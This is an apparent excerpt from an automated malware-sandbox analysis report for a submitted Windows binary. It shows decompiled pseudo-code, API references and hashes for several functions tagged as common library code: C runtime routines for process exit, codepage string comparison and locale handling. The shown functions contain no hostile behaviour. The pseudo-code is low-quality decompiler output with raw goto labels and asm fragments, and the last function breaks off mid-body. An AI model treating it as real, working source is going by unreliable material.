libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E004163C1(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x42c218(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x004163c7
0x004163cb
0x004163d6
0x004163de
0x004163e9
0x004163ef
0x004163f3
0x004163fa
0x00416400
0x00416400
0x00416402
0x00416407
0x00000000
0x0041640c
0x00416413

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004163B6,?,?,0041637E,00000000,761B5970,?), ref: 004163D6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004163E9
FreeLibrary.KERNEL32(00000000,?,?,004163B6,?,?,0041637E,00000000,761B5970,?), ref: 0041640C

Strings

CorExitProcess, xrefs: 004163E1
mscoree.dll, xrefs: 004163CF

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4f5f05966c11ea51ebf644c75ae8aabd88c19b8618a52ecfd69966d40efa50a8
Instruction ID: 36bcceeebd7516be7da67053341f23c1fe3956a0729e33caf8e501430a363c8d
Opcode Fuzzy Hash: 4f5f05966c11ea51ebf644c75ae8aabd88c19b8618a52ecfd69966d40efa50a8
Instruction Fuzzy Hash: E5F08230700229FBDB219B91DD0ABDE7A64EF00791F518071F404A21A1CB788E52DA9C

Uniqueness

Uniqueness Score: -1.00%

Function 00428CDA Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E00428CDA(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x43b054; // 0x41d6575c
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E0041845D(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E0041845D(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E0041E618(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E0041D4FF(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E0040DD70(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E0041E618(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E0041E618(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E0041D4FF(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E0040DD70(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E0041E618(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E0041CE41(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E0040D391(_t103);
													}
												}
											}
										}
									}
								}
								E0040D391(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E0040D3AF(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x00428ce2
0x00428ce9
0x00428cf1
0x00428cf4
0x00428cfa
0x00428cfd
0x00428d00
0x00428d04
0x00428d07
0x00428d0c
0x00428d21
0x00000000
0x00000000
0x00000000
0x00000000
0x00428d0e
0x00428d16
0x00428d18
0x00428d27
0x00428d27
0x00428d2c
0x00428d3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00428d2e
0x00428d37
0x00428d44
0x00428d44
0x00428d49
0x00428d50
0x00428d53
0x00428d53
0x00428d58
0x00428d64
0x00428f4a
0x00428f4a
0x00000000
0x00428d6a
0x00428d6d
0x00428df6
0x00428df8
0x00428d73
0x00428d76
0x00428dbb
0x00428dbb
0x00000000
0x00428d78
0x00428d85
0x00000000
0x00428d8b
0x00428d8d
0x00428dc5
0x00000000
0x00428dc7
0x00428dcb
0x00428dd1
0x00428dd4
0x00428dd6
0x00428dd9
0x00428dd9
0x00428dde
0x00000000
0x00000000
0x00428de0
0x00428de4
0x00428dee
0x00428df4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428de4
0x00428dd9
0x00428dd4
0x00000000
0x00428dcb
0x00428d8f
0x00428d93
0x00428d99
0x00428d9c
0x00428d9e
0x00428d9e
0x00428da3
0x00000000
0x00000000
0x00428da5
0x00428da9
0x00428db3
0x00428db9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428da9
0x00428d9e
0x00428d9c
0x00000000
0x00428dbd
0x00428dbd
0x00428dbd
0x00428d8d
0x00428d85
0x00428d76
0x00428d6d
0x00428dfe
0x00428dfe
0x00428dfe
0x00428e0b
0x00428e10
0x00428e13
0x00428e18
0x00428f51
0x00428f51
0x00428e1e
0x00428e21
0x00428e26
0x00428e28
0x00428e2a
0x00428e6d
0x00428e6f
0x00000000
0x00428e2c
0x00428e31
0x00428e4e
0x00428e53
0x00428e59
0x00000000
0x00428e5f
0x00428e5f
0x00000000
0x00428e5f
0x00428e33
0x00428e33
0x00428e38
0x00428e3a
0x00428e3f
0x00428f3c
0x00428f3c
0x00428e45
0x00428e45
0x00428e65
0x00428e65
0x00428e68
0x00428e72
0x00428e74
0x00000000
0x00428e7a
0x00428e82
0x00428e88
0x00428e8d
0x00428e92
0x00000000
0x00428e98
0x00428ea1
0x00428ea6
0x00428ea9
0x00428eae
0x00000000
0x00428eb4
0x00428eb7
0x00428ebc
0x00428ebe
0x00428ec0
0x00428ef4
0x00000000
0x00428ec2
0x00428ec7
0x00428ee2
0x00428ee7
0x00000000
0x00428ee9
0x00428ee9
0x00000000
0x00428ee9
0x00428ec9
0x00428ec9
0x00428ece
0x00428ed2
0x00428f30
0x00428f30
0x00428ed4
0x00428ed4
0x00428eef
0x00428eef
0x00428ef6
0x00428ef8
0x00000000
0x00428f13
0x00428f13
0x00428f2c
0x00428f2c
0x00428ef8
0x00428ed2
0x00428ec7
0x00428f34
0x00428f39
0x00428eae
0x00428e92
0x00428e74
0x00428e3f
0x00428e31
0x00428f40
0x00428f46
0x00428f46
0x00428e18
0x00428d58
0x00428d2c
0x00428f53
0x00428f64

APIs

GetCPInfo.KERNEL32(00000000,00000001,41D6575C,7FFFFFFF,?,?,00428F96,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00428D7D
__alloca_probe_16.LIBCMT ref: 00428E33
__alloca_probe_16.LIBCMT ref: 00428EC9
__freea.LIBCMT ref: 00428F34
__freea.LIBCMT ref: 00428F40

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: e46766b2ad2339d423fb599bb28df802dee0bb43b84cd78619e3f46af5bf0dba
Instruction ID: bedd16c058018b73f5b7f1e3450f29a300e7dd7b91460b8aa009f13322fa8cdb
Opcode Fuzzy Hash: e46766b2ad2339d423fb599bb28df802dee0bb43b84cd78619e3f46af5bf0dba
Instruction Fuzzy Hash: 36813432F022259BDF209F55A941AEFBBB69F59344F99005FE804A7381DB3DCC4487A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041A241 Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E0041A241(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t363 = E0041D4FF(0x6a6);
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t428 = _t363 + 4;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x42f660);
					_push( *0x42f59c);
					E0041A17D(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x42f59c;
					while(1) {
						L2:
						_t254 = E0042386D(_t428, 0x351, 0x42f65c);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x42f660);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E0041A17D(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x42f5cc) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E0041CA88(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E0041CA88( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E0041CA88( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E0041CA88( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E0041CA88( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t250 = _t363 + 4;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00411D34();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0x43b054; // 0x41d6575c
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E0041A241(_t365, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E00419DB7(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E00424A8B(_t445, 0x42f654);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x42f59c;
													_v456 = 1;
													do {
														_t273 = E00414A84( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x42f5cc;
													} while (_t368 <= 0x42f5cc);
													_t365 = _v468 + 2;
													_t274 = E00424A32(_t382, _t365, 0x42f65c);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E004239AD( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00411D34();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0x43b054; // 0x41d6575c
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E0041B333(_t386, _t424) + 0x278;
																_t287 = E00419DB7(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x2
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E0041D4FF(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E0041FC61(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E00411D34();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E0041CFF1(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E00419AD4(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E00420045(__eflags, _v712, 1, 0x42f510, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E0040F44A( &_v536,  *0x43b1c4, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x42f598; // 0x409b00
																					 *0x42c218(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x43b290;
																						if(_t402 == 0x43b290) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E0041CA88( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E0041CA88( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E0041CA88( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E0041CA88( *(_t433 + 0xa0 + _t370 * 4));
